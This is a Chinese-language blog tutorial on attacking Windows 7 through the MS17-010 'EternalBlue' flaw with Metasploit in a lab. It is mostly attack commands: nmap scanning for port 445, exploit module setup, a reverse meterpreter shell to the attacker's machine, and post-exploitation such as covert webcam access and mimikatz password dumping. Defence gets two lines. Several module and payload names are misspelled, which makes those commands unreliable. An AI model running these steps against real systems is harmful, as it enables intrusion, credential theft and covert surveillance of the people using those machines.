注:本教程只用于学习使用,切勿拿去搞破坏,一切法律后果与本人无关
1.攻击简介
今天就跟大家分享下刚刚学习到利用MSF框架快速搞定“MS017-010”漏洞。其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。“永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器。
2.工具准备
2.1、kali 2.0机器一台(发起攻击的主机)
IP:192.168.1.11
2.2、win7系统64位机一台,开启文件共享(被攻击的靶机)
IP:192.168.1.12
3.攻击前需要做的事情
3.1、设置两台机器为仅主机模式,并让虚拟编辑器自动分配IP,保证两台主机互相ping通。
3.2、编辑 kali 更新源
配置kali的更新源:直接编辑更新源的配置文件“/etc/apt/sources.list” ,然后将下面的源敲进去保存即可。
置完源配置文件后,直接进行更新,具体命令如下。
root@kali:~# apt-get update
3.3、MSF攻击框架版本要求
MSF框架版本要求在 4.14.17版本以上,具体版本查看方法如下。
3.3.1.终端输入 msfconsole #进入框架,可能需要30秒左右
3.3.2.输入version
3.4、安装更新metasploit(我已经更新过了)
终端输入:apt-get install metasploit-framework
4.扫描存在漏洞的主机 (注意根据相应的IP网段扫描)
4.1、nmap-n -p445192.168.1.0/24--open
针对本次演示攻击中的主机发现扫描,个人推荐使用 nmap -n -p445 192.168.1.0/24 --open 其扫描发现的效率最高。
5.ms17-010 漏洞攻击MSF框架实践记录
5.1进入msf框架并确认版本
root@kali:~# msfconsole
msf> version
5.2漏洞模块路径查询
5.3加载扫描模块 (可用Tab补全)
use auxiliary/scanner/amb/amb_ms17_010
show options
set rhosts 192.168.1.12 (靶机的IP)
exploit
5.4加载攻击模块并配置攻击参数 (可用Tab补全)
use exploit/windows/smb/ms17_010_eternablblue
set payload windows/x64/meterpreter/reverse_top
show options
set rhost 192.168.1.12 (靶机的IP)
set lhost 192.168.1.11 (发起攻击的主机IP)
set lport 443 (监听的端口)
5.5发起攻击,成功会反弹shell
输入 run 或exploit 发起攻击
当然,有的机子是不会反弹shell的,因为直接蓝屏了~
更多关于meterpreter的操作可查看:
meterpreter会话渗透利用常用的32个命令归纳小结
6.meterpreter 功能展现 (可用Tab补全)
6.1捕捉桌面
meterpreter > screenshot
6.2视屏开启
meterpreter > webcam_scream
(kali会自动打开浏览器播放被攻击电脑的摄像头,被攻击者的摄像头也会亮起来(会被发现的),本实验中不稳定不再做记录)
6.3获取系统管理密码
第一步:载入mimikatz
1.meterpreter > load mimikatz
第二步:使用命令wdigest获取密码
有关meterpreter 的功能还有很多,这里就不足做过多的说明了,就是简单记录下本次实战演练过程中遇到的各种问题和小技能有关其他的功能使用可以参考其他文档做进一步的学习。
7.永恒之蓝的防范
7.1如果没有需要禁用文件共享功能,关闭不常用端口
7.2记得拿张胶布盖住摄像头哦
参考学习
https://www.anquanke.com/post/id/86245
https://blog.csdn.net/SKI_12/article/details/77103290?locationNum=3&fps=1
https://blog.csdn.net/SHIGUANGTUJING/article/details/80599730
静 静 少 年
愿历尽千帆
归来仍少年
分享美好的事物给你们看
领取专属 10元无门槛券
私享最新 技术干货